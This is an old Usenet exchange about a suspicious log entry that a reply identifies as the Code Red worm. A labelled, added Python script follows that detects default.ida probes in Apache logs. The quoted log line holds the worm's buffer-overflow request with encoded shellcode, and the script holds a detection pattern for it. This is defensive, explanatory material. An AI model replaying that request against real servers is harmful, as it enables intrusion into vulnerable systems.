Re: Another New Worm?

From: David (thunderbolt01_at_netscape.net)
Date: 08/23/03


Date: Sat, 23 Aug 2003 18:51:41 GMT

For Example: John Smith wrote:
> Been a busy week for worms, huh? I just checked my logs and
> started seeing this. Have any of you seen it yet? Because I
> haven't found any mention of it. Maybe I found a new worm!!
>
> "GET
> /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
> NNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%
> u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a
> HTTP/1.0" 400 321
>
> The interesting thing is that it also sends a malformed
> request to the web server. I'm just wondering why it would do
> this, what the benefit is? Apache doesn't seem to mind it.
> Is it aimed at some other platform (maybe Microsoft)?
>
> This is very interesting. I may go ahead and post a report
> about it on the bugtraq security list.

It looks like the old Code Red back before they switched it

From: NNNNNNNNNNNNNNNNNNNNNNNNNNNNN
To: XXXXXXXXXXXXXXXXXXXXXXXXXXXXX

but I could be wrong.

-- 
Confucius:  He who play in root, eventually kill tree.
Registered with The Linux Counter.  http://counter.li.org/
Slackware 9.0 Kernel 2.4.21 i686 (GCC) 3.3
Uptime: 6 days, 11:49, 1 user, load average: 1.25, 1.17, 1.19
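
An added example, not part of either post: a Python sketch that scans Apache access-log lines for the default.ida request quoted above and reports the padding letter, which is the N-versus-X difference the reply points to. The sample log lines, the addresses and the function names are constructed for illustration.

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*?)" (\d{3}) (\S+)')
# /default.ida? + a long run of one repeated letter + a run of %uXXXX words
PROBE_RE = re.compile(r'/default\.ida\?(([A-Za-z])\2{31,})((?:%u[0-9a-fA-F]{4})+)')
# Padding letter -> label (N is the earlier form, X the later one)
FAMILY = {"N": "Code Red (N padding)", "X": "Code Red II (X padding)"}

def classify(line):
    """Return a dict describing a default.ida probe, or None for other traffic."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, request, status, _size = m.groups()
    p = PROBE_RE.search(request)
    if not p:
        return None
    pad = p.group(2)
    return {
        "host": host,
        "time": when,
        "status": int(status),          # 400/404 here means the server rejected it
        "pad_char": pad,
        "pad_len": len(p.group(1)),
        "u_words": p.group(3).count("%u"),
        "family": FAMILY.get(pad.upper(), "unknown default.ida probe"),
    }

def summarize(lines):
    """Return (Counter keyed by (host, family), list of probe dicts)."""
    hits = [h for h in map(classify, lines) if h]
    return Counter((h["host"], h["family"]) for h in hits), hits

# Constructed sample input (documentation addresses, made-up timestamps)
PAYLOAD = "%u9090%u6858%ucbd3%u7801"  # first words of the request quoted above
SAMPLE = [
    '192.0.2.10 - - [23/Aug/2003:18:40:01 +0000] "GET /default.ida?' + "N" * 224 + PAYLOAD + '=a HTTP/1.0" 400 321',
    '192.0.2.77 - - [23/Aug/2003:18:41:12 +0000] "GET /default.ida?' + "X" * 224 + PAYLOAD + '=a HTTP/1.0" 404 205',
    '198.51.100.5 - - [23/Aug/2003:18:42:30 +0000] "GET /index.html HTTP/1.0" 200 1043',
]

if __name__ == "__main__":
    for hit in summarize(SAMPLE)[1]:
        print(hit["host"], hit["status"], hit["pad_len"], hit["family"])
```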

